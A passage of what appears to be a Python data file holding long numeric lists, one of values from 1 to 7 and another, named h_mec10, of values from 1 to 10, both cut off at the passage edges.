6.0, 3.0, 1.0, 
1.0, 3.0, 3.0, 7.0, 1.0, 4.0, 6.0, 2.0, 6.0, 6.0, 3.0, 2.0, 2.0, 6.0, 4.0, 2.0, 2.0, 1.0, 6.0, 6.0, 2.0, 3.0, 6.0, 4.0, 2.0, 7.0, 7.0, 4.0, 4.0, 7.0, 4.0, 7.0, 1.0, 6.0, 2.0, 4.0, 3.0, 5.0, 2.0, 3.0, 6.0, 1.0, 7.0, 1.0, 3.0, 3.0, 1.0, 6.0, 3.0, 3.0, 2.0, 4.0, 2.0, 6.0, 3.0, 3.0, 7.0, 2.0, 7.0, 7.0, 3.0, 1.0, 6.0, 3.0, 2.0, 6.0, 4.0, 7.0, 6.0, 1.0, 2.0, 4.0, 7.0, 3.0, 6.0, 2.0, 5.0, 1.0, 2.0, 4.0, 7.0, 4.0, 3.0, 2.0, 3.0, 4.0, 4.0, 1.0, 4.0, 4.0, 6.0, 2.0, 1.0, 3.0, 7.0, 2.0, 5.0, 6.0, 1.0, 5.0, 3.0, 2.0, 3.0, 3.0, 4.0, 3.0, 6.0, 2.0, 5.0, 7.0, 3.0, 5.0, 2.0, 1.0, 6.0, 1.0, 2.0, 2.0, 1.0, 6.0, 7.0, 1.0, 6.0, 1.0, 1.0, 4.0, 1.0, 4.0, 4.0, 4.0, 3.0, 2.0, 4.0, 6.0, 1.0, 7.0, 6.0, 7.0, 7.0, 6.0, 6.0, 3.0, 3.0, 4.0, 4.0, 6.0, 3.0, 1.0, 1.0, 6.0, 3.0, 1.0, 6.0, 1.0, 4.0, 6.0, 6.0, 3.0, 4.0, 4.0, 2.0, 1.0, 6.0, 3.0, 4.0, 1.0, 7.0, 5.0, 6.0, 3.0, 3.0, 3.0, 6.0, 3.0, 4.0, 7.0, 6.0, 7.0, 5.0, 1.0, 1.0, 2.0, 1.0, 7.0, 3.0, 2.0, 6.0, 6.0, 3.0, 7.0, 3.0, 1.0, 4.0, 5.0, 1.0, 3.0, 3.0, 2.0, 6.0, 1.0, 2.0, 1.0, 3.0, 2.0, 6.0, 6.0, 1.0, 5.0, 2.0, 4.0, 7.0, 3.0, 4.0, 2.0, 3.0, 2.0, 1.0, 4.0, 6.0, 1.0, 3.0, 3.0, 1.0, 2.0, 7.0, 1.0, 1.0, 2.0, 2.0, 1.0, 6.0, 2.0, 1.0, 7.0, 6.0, 1.0, 1.0, 4.0, 7.0, 7.0, 6.0, 1.0, 4.0, 7.0, 5.0, 4.0, 6.0, 2.0, 3.0, 2.0, 6.0, 1.0, 4.0, 6.0, 6.0, 1.0, 7.0, 3.0, 3.0, 1.0, 3.0, 1.0, 2.0, 7.0, 4.0, 1.0, 2.0, 3.0, 4.0, 1.0, 3.0, 6.0, 2.0, 3.0, 6.0, 3.0, 1.0, 7.0, 1.0, 6.0, 1.0, 3.0, 4.0, 7.0, 3.0, 3.0, 2.0, 2.0, 7.0, 4.0, 1.0, 1.0, 1.0, 4.0, 1.0, 7.0, 6.0, 1.0, 3.0, 7.0, 1.0, 6.0, 1.0, 6.0, 7.0, 1.0, 4.0, 3.0, 2.0, 1.0, 1.0, 3.0, 4.0, 7.0, 3.0, 2.0, 6.0, 3.0, 3.0, 5.0, 6.0, 2.0, 2.0, 1.0, 4.0, 1.0, 5.0, 1.0, 1.0, 4.0, 5.0, 4.0, 2.0, 1.0, 1.0, 5.0, 4.0, 6.0, 1.0, 4.0, 1.0, 1.0, 6.0, 3.0, 6.0, 1.0, 1.0, 2.0, 4.0, 3.0, 1.0, 7.0, 2.0, 4.0, 4.0, 6.0, 3.0, 3.0, 1.0, 6.0, 4.0, 4.0, 6.0, 1.0, 1.0, 1.0, 5.0, 1.0, 3.0, 6.0, 3.0, 4.0, 4.0, 5.0, 4.0, 6.0, 4.0, 2.0, 6.0, 6.0, 1.0, 3.0, 4.0, 1.0, 1.0, 4.0, 1.0, 2.0, 4.0, 6.0, 4.0, 5.0, 4.0, 6.0, 5.0, 1.0, 6.0, 1.0, 3.0, 1.0, 
5.0, 4.0, 6.0, 6.0, 6.0, 4.0, 3.0, 3.0, 7.0, 4.0, 3.0, 4.0, 3.0, 3.0, 2.0, 6.0, 2.0, 1.0, 4.0, 6.0, 3.0, 3.0, 1.0, 3.0, 1.0, 4.0, 6.0, 3.0, 2.0, 1.0, 7.0, 3.0, 2.0, 3.0, 4.0, 3.0, 3.0, 1.0, 2.0, 1.0, 6.0, 7.0, 1.0, 3.0, 1.0, 6.0, 2.0, 7.0, 3.0, 5.0, 2.0, 1.0, 3.0, 1.0, 4.0, 4.0, 3.0, 4.0, 5.0, 3.0, 1.0, 3.0, 1.0, 5.0, 4.0, 2.0, 2.0, 3.0, 4.0, 1.0, 1.0, 6.0, 2.0, 1.0, 3.0, 1.0, 7.0, 1.0, 1.0, 1.0, 2.0, 5.0, 4.0, 3.0, 1.0, 4.0, 2.0, 6.0, 3.0, 6.0, 3.0, 2.0, 3.0, 5.0, 2.0, 3.0, 4.0, 3.0, 7.0, 7.0, 4.0, 1.0, 2.0, 6.0, 3.0, 6.0, 1.0, 3.0, 3.0, 3.0, 7.0, 1.0, 3.0, 1.0, 6.0, 4.0, 6.0, 1.0, 5.0, 6.0, 4.0, 3.0, 1.0, 1.0, 2.0, 4.0, 1.0, 3.0, 3.0, 6.0, 7.0, 2.0, 7.0, 2.0, 2.0, 2.0, 1.0, 4.0, 5.0, 3.0, 4.0, 1.0, 4.0, 1.0, 3.0, 5.0, 6.0, 4.0, 6.0, 4.0, 1.0, 3.0, 4.0, 4.0, 2.0, 1.0, 2.0, 2.0, 4.0, 7.0, 5.0, 2.0, 1.0, 7.0, 3.0, 4.0, 6.0, 2.0, 7.0, 1.0, 6.0, 3.0, 2.0, 2.0, 1.0, 5.0, 6.0, 1.0, 1.0, 5.0, 3.0, 6.0, 5.0, 3.0, 4.0, 7.0, 5.0, 1.0, 2.0, 3.0, 1.0, 4.0, 6.0, 1.0, 1.0, 6.0, 6.0, 3.0, 4.0, 4.0, 1.0, 1.0, 3.0, 1.0, 4.0, 1.0, 2.0, 3.0, 6.0, 4.0, 4.0, 4.0, 2.0, 4.0, 6.0, 5.0, 3.0, 4.0, 3.0, 1.0, 2.0, 6.0, 6.0, 7.0, 1.0, 4.0, 4.0, 4.0, 6.0, 1.0, 4.0, 7.0, 7.0, 3.0, 4.0, 6.0, 6.0, 7.0, 1.0, 3.0, 5.0, 1.0, 6.0, 6.0, 6.0, 4.0, 7.0, 2.0, 3.0, 6.0, 1.0, 2.0, 2.0, 6.0, 6.0, 6.0, 3.0, 6.0, 4.0, 1.0, 7.0, 5.0, 3.0, 4.0, 6.0, 3.0, 1.0, 6.0, 4.0, 1.0, 7.0, 3.0, 7.0, 2.0, 6.0, 1.0, 7.0, 2.0, 4.0, 3.0, 5.0, 4.0, 7.0, 6.0, 4.0, 3.0, 1.0, 1.0, 2.0, 6.0, 1.0, 2.0, 4.0, 4.0, 2.0, 4.0, 4.0, 3.0, 2.0, 3.0, 3.0, 1.0, 7.0, 2.0, 7.0, 7.0, 7.0, 2.0, 3.0, 3.0, 4.0, 5.0, 4.0, 2.0, 5.0, 4.0, 6.0, 1.0, 4.0, 4.0, 7.0, 2.0, 3.0, 2.0, 2.0, 6.0, 6.0, 4.0, 4.0, 4.0, 6.0, 3.0, 3.0, 6.0, 4.0, 2.0, 6.0, 3.0, 3.0, 1.0, 5.0, 1.0, 4.0, 1.0, 6.0, 6.0, 1.0, 7.0, 3.0, 4.0, 6.0, 5.0, 4.0, 2.0, 3.0, 3.0, 1.0, 1.0, 1.0, 3.0, 1.0, 5.0, 2.0, 3.0, 2.0, 3.0, 4.0, 1.0, 6.0, 1.0, 6.0, 6.0, 7.0, 3.0, 1.0, 3.0, 1.0, 4.0, 3.0, 5.0, 2.0, 2.0, 1.0, 3.0, 1.0, 6.0, 2.0, 5.0, 1.0, 6.0, 1.0, 1.0, 6.0, 7.0, 1.0, 6.0, 4.0, 4.0, 1.0, 4.0, 
6.0, 4.0, 4.0, 2.0, 1.0, 1.0, 3.0, 6.0, 3.0, 1.0, 4.0, 3.0, 1.0, 3.0, 7.0, 1.0, 1.0, 6.0, 4.0, 2.0, 3.0, 7.0, 1.0, 1.0, 6.0, 1.0, 5.0, 4.0, 2.0, 2.0, 1.0, 4.0, 3.0, 3.0, 3.0, 6.0, 3.0, 6.0, 6.0, 1.0, 3.0, 6.0, 6.0, 3.0, 5.0, 3.0, 2.0, 4.0, 5.0, 2.0, 1.0, 7.0, 6.0, 1.0, 7.0, 5.0, 2.0, 1.0, 4.0, 1.0, 6.0, 5.0, 4.0, 2.0, 3.0, 3.0, 4.0, 6.0, 1.0, 4.0, 6.0, 6.0, 2.0, 6.0, 2.0, 6.0, 1.0, 2.0, 2.0, 2.0, 4.0, 2.0, 3.0, 6.0, 2.0, 1.0, 2.0, 2.0, 7.0, 3.0, 4.0, 6.0, 7.0, 1.0, 2.0, 7.0, 3.0, 4.0, 2.0, 7.0, 1.0, 6.0, 4.0, 6.0, 1.0, 6.0, 7.0, 4.0, 3.0, 6.0, 6.0, 6.0, 1.0, 3.0, 1.0, 6.0, 3.0, 6.0, 2.0, 6.0, 3.0, 1.0, 6.0, 1.0, 3.0, 4.0, 6.0, 1.0, 6.0, 1.0, 4.0, 2.0, 6.0, 3.0, 3.0, 2.0, 4.0, 4.0, 3.0, 2.0, 4.0, 1.0, 2.0, 3.0, 7.0, 3.0, 6.0, 2.0, 1.0, 1.0, 2.0, 6.0, 2.0, 6.0, 1.0, 1.0, 2.0, 2.0, 7.0, 2.0, 7.0, 6.0, 2.0, 2.0, 3.0, 1.0, 1.0, 4.0, 4.0, 2.0, 6.0, 7.0, 4.0, 4.0, 3.0, 3.0, 3.0, 7.0, 7.0, 2.0, 2.0, 7.0, 3.0, 2.0, 2.0, 4.0, 3.0, 4.0, 6.0, 5.0, 6.0, 1.0, 4.0, 3.0, 5.0, 1.0, 7.0, 6.0, 1.0, 1.0, 4.0, 6.0, 3.0, 1.0, 4.0, 1.0, 3.0, 6.0, 1.0, 4.0, 3.0, 4.0, 6.0, 7.0, 4.0, 2.0, 6.0, 1.0, 1.0, 4.0, 5.0, 7.0, 4.0, 1.0, 4.0, 4.0, 7.0, 1.0, 2.0, 7.0, 7.0, 5.0, 1.0, 1.0, 4.0, 7.0, 6.0, 4.0, 4.0, 2.0, 3.0, 4.0, 3.0, 1.0, 4.0, 6.0, 2.0, 4.0, 1.0, 4.0, 4.0, 6.0, 6.0, 7.0, 4.0, 7.0, 4.0, 4.0, 6.0, 5.0, 2.0, 2.0, 1.0, 6.0, 2.0, 3.0, 4.0, 6.0, 4.0, 6.0, 7.0, 1.0, 1.0, 2.0, 4.0, 6.0, 6.0, 1.0, 1.0, 3.0, 5.0, 3.0, 6.0, 1.0, 1.0, 7.0, 5.0, 2.0, 4.0, 6.0, 3.0, 3.0, 4.0, 4.0, 4.0, 7.0, 4.0, 7.0, 4.0, 6.0, 3.0, 3.0, 2.0, 5.0, 2.0, 3.0, 7.0, 1.0, 2.0, 4.0, 2.0, 1.0, 4.0, 4.0, 3.0, 6.0, 6.0, 6.0, 1.0, 1.0, 4.0, 3.0, 3.0, 4.0, 1.0, 3.0, 4.0, 4.0, 2.0, 5.0, 4.0, 3.0, 5.0, 6.0, 1.0, 2.0, 6.0, 4.0, 4.0, 1.0, 2.0, 4.0, 2.0, 1.0, 1.0, 6.0, 2.0, 7.0, 4.0, 1.0, 1.0, 1.0, 6.0, 3.0, 4.0, 1.0, 5.0, 1.0, 2.0, 3.0, 1.0, 4.0, 3.0, 2.0, 4.0, 6.0, 1.0, 4.0, 4.0, 6.0, 6.0, 7.0, 2.0, 5.0, 6.0, 4.0, 1.0, 6.0, 4.0, 6.0, 7.0, 1.0, 3.0, 2.0, 1.0, 4.0, 4.0, 4.0, 1.0, 1.0, 3.0, 6.0, 6.0, 6.0, 3.0, 3.0, 3.0, 1.0, 3.0, 4.0, 
1.0, 3.0, 1.0, 1.0, 2.0, 1.0, 4.0, 2.0, 5.0, 2.0, 4.0, 7.0, 4.0, 6.0, 6.0, 7.0, 1.0, 7.0, 1.0, 6.0, 3.0, 6.0, 1.0, 7.0, 1.0, 3.0, 5.0, 1.0, 1.0, 2.0, 6.0, 6.0, 6.0, 3.0, 1.0, 1.0, 6.0, 7.0, 3.0, 7.0, 1.0, 3.0, 2.0, 1.0, 1.0, 2.0, 6.0, 6.0, 6.0, 6.0, 1.0, 2.0, 2.0, 6.0, 1.0, 7.0, 2.0, 4.0, 6.0, 6.0, 3.0, 5.0, 3.0, 3.0, 3.0, 4.0, 7.0, 5.0, 4.0, 3.0, 4.0, 3.0, 3.0, 1.0, 1.0, 6.0, 2.0, 1.0, 2.0, 4.0, 7.0, 6.0, 7.0, 4.0, 2.0, 7.0, 2.0, 2.0, 2.0, 2.0, 6.0, 6.0, 7.0, 1.0, 2.0, 6.0, 1.0, 4.0, 5.0, 1.0, 3.0, 2.0, 6.0, 4.0, 7.0, 3.0, 2.0, 3.0, 6.0, 3.0, 3.0, 4.0, 4.0, 3.0, 5.0, 1.0, 3.0, 2.0, 7.0, 7.0, 3.0, 3.0, 6.0, 7.0, 6.0, 4.0, 1.0, 4.0, 4.0, 4.0, 1.0, 6.0, 3.0, 6.0, 1.0, 2.0, 5.0, 1.0, 6.0, 5.0, 3.0, 6.0, 5.0, 4.0, 3.0, 4.0, 1.0, 7.0, 1.0, 1.0, 5.0, 4.0, 1.0, 2.0, 1.0, 7.0, 6.0, 7.0, 3.0, 3.0, 6.0, 3.0, 6.0, 7.0, 5.0, 3.0, 4.0, 1.0, 2.0, 6.0, 4.0, 6.0, 7.0, 3.0, 3.0, 1.0, 6.0, 7.0, 2.0, 3.0, 4.0, 2.0, 7.0, 5.0, 2.0, 6.0, 4.0, 3.0, 4.0, 4.0, 6.0, 6.0, 5.0, 1.0, 7.0, 2.0, 7.0, 3.0, 1.0, 1.0, 4.0, 7.0, 4.0, 7.0, 6.0, 1.0, 3.0, 2.0, 4.0, 1.0, 2.0, 2.0, 6.0, 4.0, 3.0, 1.0, 7.0, 4.0, 2.0, 2.0, 1.0, 3.0, 2.0, 2.0, 5.0, 4.0, 7.0, 4.0, 1.0, 6.0, 6.0, 3.0, 3.0, 1.0, 1.0, 4.0, 4.0, 1.0, 4.0, 7.0, 5.0, 2.0, 3.0, 6.0, 1.0, 2.0, 2.0, 2.0, 2.0, 1.0, 3.0, 3.0, 4.0, 1.0, 7.0, 6.0, 6.0, 1.0, 2.0, 1.0, 6.0, 6.0, 5.0, 1.0, 7.0, 7.0, 3.0, 3.0, 5.0, 4.0, 6.0, 3.0, 3.0, 6.0, 7.0, 4.0, 3.0, 2.0, 3.0, 5.0, 1.0, 2.0, 3.0, 5.0, 5.0, 1.0, 4.0, 6.0, 1.0, 4.0, 7.0, 2.0, 1.0, 6.0, 5.0, 1.0, 5.0, 5.0, 6.0, 2.0, 2.0, 1.0, 4.0, 3.0, 4.0, 6.0, 3.0, 5.0, 1.0, 7.0, 4.0, 6.0, 1.0, 1.0, 7.0, 1.0, 7.0, 4.0, 1.0, 1.0, 6.0, 1.0, 5.0, 1.0, 4.0, 7.0, 1.0, 7.0, 1.0, 2.0, 7.0, 7.0, 5.0, 6.0, 4.0, 7.0, 7.0, 4.0, 4.0, 4.0, 1.0, 1.0, 6.0, 7.0, 7.0, 6.0, 6.0, 6.0, 4.0, 2.0, 6.0, 1.0, 6.0, 3.0, 2.0, 2.0, 3.0, 1.0, 7.0, 2.0, 4.0, 7.0, 3.0, 4.0, 3.0, 4.0, 2.0, 4.0, 2.0, 6.0, 1.0, 2.0, 5.0, 4.0, 1.0, 2.0, 3.0, 7.0, 4.0, 1.0, 3.0, 4.0, 5.0, 4.0, 2.0, 3.0, 7.0, 2.0, 6.0, 2.0, 3.0, 4.0, 2.0, 1.0, 6.0, 2.0, 4.0, 2.0, 3.0, 1.0, 
4.0, 4.0, 3.0, 5.0, 6.0, 7.0, 1.0, 4.0, 2.0, 1.0, 2.0, 6.0, 4.0, 6.0, 2.0, 1.0, 6.0, 3.0, 4.0, 1.0, 6.0, 2.0, 4.0, 2.0, 2.0, 5.0, 4.0, 6.0, 6.0, 1.0, 1.0, 6.0, 6.0, 3.0, 1.0, 7.0, 4.0, 6.0, 6.0, 5.0, 1.0, 5.0, 2.0, 1.0, 4.0, 1.0, 2.0, 4.0, 2.0, 4.0, 7.0, 2.0, 3.0, 2.0, 4.0, 7.0, 3.0, 3.0, 1.0, 4.0, 6.0, 6.0, 5.0, 2.0, 1.0, 6.0, 6.0, 6.0, 7.0, 2.0, 4.0, 6.0, 2.0, 4.0, 6.0, 7.0, 2.0, 3.0, 6.0, 6.0, 1.0, 2.0, 5.0, 3.0, 6.0, 3.0, 5.0, 1.0, 3.0, 4.0, 3.0, 3.0, 7.0, 4.0, 1.0, 2.0, 2.0, 2.0, 2.0, 1.0, 1.0, 3.0, 1.0, 4.0, 1.0, 2.0, 6.0, 7.0, 4.0, 1.0, 1.0, 4.0, 6.0, 4.0, 4.0, 6.0, 4.0, 1.0, 7.0, 2.0, 4.0, 1.0, 6.0, 6.0, 2.0, 2.0, 6.0, 7.0, 4.0, 3.0, 6.0, 6.0, 3.0, 7.0, 4.0, 1.0, 3.0, 1.0, 4.0, 3.0, 6.0, 7.0, 3.0, 3.0, 5.0, 6.0, 6.0, 7.0, 7.0, 1.0, 4.0, 1.0, 6.0, 4.0, 4.0, 3.0, 1.0, 2.0, 5.0, 1.0, 3.0, 3.0, 4.0, 4.0, 5.0, 3.0, 4.0, 1.0, 1.0, 5.0, 3.0, 2.0, 6.0, 1.0, 3.0, 3.0, 1.0, 4.0, 6.0, 2.0, 1.0, 1.0, 3.0, 6.0, 6.0, 7.0, 6.0, 6.0, 1.0, 3.0, 2.0, 2.0, 1.0, 3.0, 2.0, 1.0, 5.0, 4.0, 3.0, 1.0, 3.0, 4.0, 3.0, 7.0, 4.0, 5.0, 7.0, 3.0, 4.0, 6.0, 6.0, 7.0, 1.0, 1.0, 5.0, 2.0, 7.0, 3.0, 3.0, 6.0, 2.0, 1.0, 7.0, 2.0, 6.0, 1.0, 6.0, 7.0, 1.0, 7.0, 6.0, 3.0, 1.0, 3.0, 2.0, 1.0, 1.0, 7.0, 3.0, 1.0, 1.0, 7.0, 4.0, 2.0, 6.0, 4.0, 6.0, 6.0, 1.0, 1.0, 3.0, 3.0, 4.0, 2.0, 3.0, 4.0, 4.0, 1.0, 1.0, 2.0, 2.0, 4.0, 7.0, 1.0, 4.0, 6.0, 4.0, 1.0, 1.0, 4.0, 6.0, 4.0, 1.0, 3.0, 3.0, 2.0, 7.0, 5.0, 3.0, 6.0, 6.0, 3.0, 4.0, 2.0, 2.0, 4.0, 5.0, 1.0, 1.0, 7.0, 6.0, 6.0, 3.0, 3.0, 4.0, 4.0, 2.0, 7.0, 6.0, 2.0, 3.0, 6.0, 1.0, 2.0, 2.0, 1.0, 6.0, 4.0, 6.0, 7.0, 3.0, 6.0, 6.0, 4.0, 4.0, 4.0, 6.0, 4.0, 6.0, 6.0, 1.0, 5.0, 4.0, 3.0, 6.0, 1.0, 1.0, 1.0, 3.0, 5.0, 1.0, 7.0, 6.0, 4.0, 4.0, 1.0, 2.0, 3.0, 7.0, 7.0, 6.0, 6.0, 2.0, 7.0, 4.0, 1.0, 7.0, 2.0, 3.0, 2.0, 6.0, 5.0, 6.0, 5.0, 2.0, 3.0, 6.0, 7.0, 1.0, 4.0, 7.0, 7.0, 3.0, 2.0, 6.0, 1.0, 1.0, 2.0, 2.0, 6.0, 2.0, 7.0, 1.0, 6.0, 2.0, 6.0, 4.0, 3.0, 4.0, 1.0, 6.0, 4.0, 3.0, 5.0, 3.0, 2.0, 4.0, 2.0, 2.0, 4.0, 7.0, 4.0, 3.0, 3.0, 6.0, 1.0, 2.0, 7.0, 5.0, 1.0, 
4.0, 3.0, 5.0, 2.0, 6.0, 7.0, 3.0, 6.0, 1.0, 3.0, 7.0, 7.0, 2.0, 2.0, 6.0, 2.0, 2.0, 3.0, 6.0, 6.0, 2.0, 6.0, 6.0, 6.0, 6.0, 6.0, 2.0, 6.0, 4.0, 6.0, 4.0, 7.0, 6.0, 2.0, 6.0, 2.0, 7.0, 4.0, 5.0, 6.0, 4.0, 1.0, 6.0, 7.0, 5.0, 6.0, 1.0, 6.0, 6.0, 1.0, 3.0, 4.0, 2.0, 3.0, 2.0, 6.0, 3.0, 4.0, 2.0, 6.0, 4.0, 1.0, 4.0, 3.0, 7.0, 6.0, 1.0, 6.0, 3.0, 5.0, 1.0, 4.0, 3.0, 6.0, 3.0, 6.0, 4.0, 2.0, 2.0, 3.0, 4.0, 6.0, 4.0, 2.0, 1.0, 2.0, 6.0, 2.0, 2.0, 3.0, 1.0, 2.0, 4.0, 2.0, 1.0, 2.0, 3.0, 7.0, 6.0, 4.0, 1.0, 4.0, 1.0, 5.0, 2.0, 7.0, 6.0, 4.0, 3.0, 4.0, 4.0, 4.0, 1.0, 6.0, 2.0, 6.0, 3.0, 2.0, 6.0, 6.0, 1.0, 1.0, 3.0, 6.0, 4.0, 4.0, 4.0, 3.0, 4.0, 4.0, 3.0, 1.0, 4.0, 6.0, 3.0, 2.0, 4.0, 6.0, 2.0, 3.0, 7.0, 5.0, 4.0, 1.0, 5.0, 6.0, 2.0, 4.0, 1.0, 5.0, 4.0, 7.0, 6.0, 6.0, 5.0, 2.0, 6.0, 3.0, 5.0, 4.0, 2.0, 6.0, 6.0, 4.0, 1.0, 4.0, 5.0, 6.0, 3.0, 4.0, 1.0, 2.0, 6.0, 2.0, 6.0, 1.0, 1.0, 1.0, 4.0, 1.0, 4.0, 1.0, 6.0, 1.0, 3.0, 3.0, 1.0, 1.0, 3.0, 3.0, 5.0, 7.0, 1.0, 4.0, 1.0, 7.0, 1.0, 5.0, 2.0, 2.0, 2.0, 6.0]
h_mec10 = [9.0, 6.0, 6.0, 5.0, 3.0, 3.0, 9.0, 5.0, 5.0, 1.0, 2.0, 8.0, 8.0, 2.0, 9.0, 5.0, 2.0, 9.0, 3.0, 1.0, 9.0, 6.0, 8.0, 8.0, 10.0, 4.0, 2.0, 6.0, 6.0, 4.0, 2.0, 5.0, 8.0, 5.0, 9.0, 1.0, 10.0, 6.0, 8.0, 8.0, 6.0, 1.0, 4.0, 2.0, 1.0, 4.0, 1.0, 6.0, 5.0, 3.0, 3.0, 1.0, 8.0, 5.0, 4.0, 5.0, 5.0, 2.0, 8.0, 10.0, 8.0, 8.0, 5.0, 9.0, 4.0, 6.0, 9.0, 4.0, 5.0, 8.0, 6.0, 3.0, 5.0, 3.0, 9.0, 6.0, 4.0, 3.0, 9.0, 2.0, 7.0, 8.0, 8.0, 4.0, 10.0, 6.0, 5.0, 3.0, 9.0, 7.0, 7.0, 5.0, 4.0, 6.0, 1.0, 6.0, 9.0, 2.0, 5.0, 2.0, 9.0, 9.0, 6.0, 9.0, 6.0, 8.0, 8.0, 2.0, 2.0, 9.0, 5.0, 2.0, 1.0, 9.0, 3.0, 8.0, 6.0, 5.0, 7.0, 3.0, 10.0, 5.0, 10.0, 1.0, 1.0, 8.0, 9.0, 2.0, 5.0, 5.0, 3.0, 8.0, 9.0, 9.0, 8.0, 1.0, 9.0, 6.0, 8.0, 3.0, 4.0, 9.0, 1.0, 2.0, 7.0, 6.0, 8.0, 4.0, 5.0, 10.0, 5.0, 3.0, 1.0, 6.0, 8.0, 7.0, 8.0, 1.0, 10.0, 6.0, 6.0, 1.0, 6.0, 6.0, 6.0, 3.0, 8.0, 1.0, 8.0, 1.0, 2.0, 6.0, 2.0, 8.0, 1.0, 5.0, 10.0, 6.0, 3.0, 6.0, 1.0, 1.0, 4.0, 5.0, 3.0, 4.0, 7.0, 5.0, 1.0, 1.0, 1.0, 6.0, 8.0, 8.0, 6.0, 3.0, 9.0, 4.0, 5.0, 8.0, 8.0, 1.0, 1.0, 9.0, 1.0, 1.0, 10.0, 5.0, 7.0, 10.0, 6.0, 3.0, 7.0, 5.0, 4.0, 5.0, 5.0, 9.0, 8.0, 5.0, 2.0, 8.0, 8.0, 5.0, 9.0, 4.0, 3.0, 1.0, 5.0, 6.0, 9.0, 9.0, 9.0, 4.0, 8.0, 5.0, 5.0, 6.0, 3.0, 9.0, 4.0, 5.0, 5.0, 9.0, 1.0, 8.0, 8.0, 1.0, 9.0, 4.0, 5.0, 3.0, 3.0, 7.0, 4.0, 2.0, 6.0, 8.0, 7.0, 9.0, 10.0, 9.0, 1.0, 8.0, 7.0, 10.0, 6.0, 8.0, 7.0, 1.0, 9.0, 10.0, 3.0, 3.0, 5.0, 5.0, 5.0, 6.0, 9.0, 1.0, 6.0, 10.0, 9.0, 8.0, 10.0, 8.0, 8.0, 9.0, 3.0, 6.0, 1.0, 9.0, 6.0, 4.0, 8.0, 2.0, 8.0, 8.0, 6.0, 9.0, 2.0, 2.0, 4.0, 3.0, 6.0, 6.0, 2.0, 1.0, 4.0, 1.0, 1.0, 1.0, 1.0, 2.0, 9.0, 1.0, 9.0, 9.0, 5.0, 9.0, 5.0, 5.0, 3.0, 2.0, 10.0, 7.0, 8.0, 4.0, 8.0, 2.0, 8.0, 4.0, 4.0, 4.0, 1.0, 8.0, 1.0, 5.0, 1.0, 3.0, 1.0, 8.0, 10.0, 4.0, 9.0, 7.0, 1.0, 8.0, 8.0, 1.0, 6.0, 4.0, 5.0, 3.0, 1.0, 3.0, 5.0, 8.0, 8.0, 8.0, 1.0, 3.0, 4.0, 1.0, 6.0, 6.0, 5.0, 9.0, 6.0, 4.0, 3.0, 9.0, 5.0, 1.0, 8.0, 9.0, 6.0, 8.0, 3.0, 10.0, 7.0, 3.0, 1.0, 6.0, 6.0, 6.0, 1.0, 5.0, 9.0, 9.0, 1.0, 4.0, 9.0, 1.0, 
2.0, 1.0, 1.0, 3.0, 5.0, 1.0, 2.0, 9.0, 5.0, 5.0, 4.0, 9.0, 6.0, 3.0, 2.0, 4.0, 8.0, 5.0, 5.0, 2.0, 10.0, 8.0, 3.0, 8.0, 5.0, 7.0, 9.0, 6.0, 5.0, 6.0, 1.0, 3.0, 3.0, 3.0, 6.0, 4.0, 6.0, 10.0, 5.0, 1.0, 3.0, 6.0, 8.0, 10.0, 3.0, 8.0, 6.0, 5.0, 6.0, 2.0, 8.0, 4.0, 8.0, 10.0, 4.0, 7.0, 6.0, 6.0, 10.0, 8.0, 3.0, 3.0, 10.0, 8.0, 5.0, 4.0, 5.0, 8.0, 4.0, 7.0, 7.0, 8.0, 8.0, 1.0, 10.0, 8.0, 6.0, 5.0, 10.0, 1.0, 9.0, 10.0, 1.0, 6.0, 3.0, 1.0, 2.0, 6.0, 9.0, 4.0, 7.0, 5.0, 1.0, 5.0, 9.0, 10.0, 5.0, 9.0, 3.0, 8.0, 6.0, 4.0, 6.0, 5.0, 2.0, 9.0, 5.0, 5.0, 2.0, 9.0, 1.0, 10.0, 5.0, 5.0, 1.0, 9.0, 6.0, 9.0, 5.0, 8.0, 1.0, 8.0, 4.0, 5.0, 9.0, 7.0, 1.0, 1.0, 9.0, 6.0, 9.0, 6.0, 9.0, 7.0, 6.0, 3.0, 8.0, 4.0, 6.0, 1.0, 4.0, 6.0, 9.0, 8.0, 1.0, 6.0, 9.0, 8.0, 4.0, 1.0, 6.0, 1.0, 6.0, 9.0, 3.0, 1.0, 6.0, 8.0, 2.0, 7.0, 5.0, 9.0, 2.0, 4.0, 10.0, 6.0, 8.0, 10.0, 7.0, 1.0, 2.0, 10.0, 4.0, 4.0, 3.0, 9.0, 10.0, 9.0, 6.0, 4.0, 8.0, 4.0, 5.0, 10.0, 3.0, 7.0, 4.0, 1.0, 5.0, 6.0, 2.0, 5.0, 8.0, 1.0, 1.0, 8.0, 5.0, 3.0, 1.0, 8.0, 10.0, 5.0, 1.0, 3.0, 9.0, 5.0, 6.0, 10.0, 1.0, 1.0, 10.0, 7.0, 8.0, 3.0, 9.0, 8.0, 4.0, 10.0, 8.0, 10.0, 8.0, 6.0, 3.0, 9.0, 4.0, 2.0, 7.0, 8.0, 3.0, 1.0, 8.0, 3.0, 1.0, 10.0, 7.0, 9.0, 6.0, 2.0, 10.0, 3.0, 4.0, 10.0, 10.0, 1.0, 1.0, 3.0, 1.0, 6.0, 10.0, 10.0, 8.0, 6.0, 5.0, 6.0, 2.0, 9.0, 8.0, 3.0, 9.0, 8.0, 5.0, 6.0, 1.0, 9.0, 8.0, 2.0, 6.0, 9.0, 10.0, 1.0, 6.0, 3.0, 8.0, 10.0, 8.0, 2.0, 4.0, 4.0, 4.0, 5.0, 7.0, 8.0, 3.0, 5.0, 10.0, 10.0, 8.0, 3.0, 6.0, 9.0, 9.0, 2.0, 2.0, 8.0, 8.0, 5.0, 8.0, 8.0, 5.0, 5.0, 4.0, 4.0, 4.0, 8.0, 10.0, 8.0, 7.0, 1.0, 2.0, 3.0, 1.0, 1.0, 1.0, 8.0, 10.0, 6.0, 6.0, 1.0, 9.0, 8.0, 1.0, 10.0, 9.0, 5.0, 3.0, 9.0, 9.0, 8.0, 6.0, 9.0, 9.0, 4.0, 4.0, 6.0, 3.0, 2.0, 3.0, 4.0, 6.0, 4.0, 8.0, 6.0, 7.0, 4.0, 9.0, 3.0, 9.0, 8.0, 4.0, 1.0, 5.0, 9.0, 9.0, 4.0, 1.0, 3.0, 7.0, 9.0, 10.0, 3.0, 5.0, 7.0, 3.0, 3.0, 5.0, 2.0, 4.0, 4.0, 4.0, 1.0, 8.0, 8.0, 9.0, 3.0, 9.0, 7.0, 10.0, 8.0, 10.0, 8.0, 8.0, 7.0, 5.0, 3.0, 3.0, 7.0, 8.0, 4.0, 5.0, 9.0, 1.0, 2.0, 
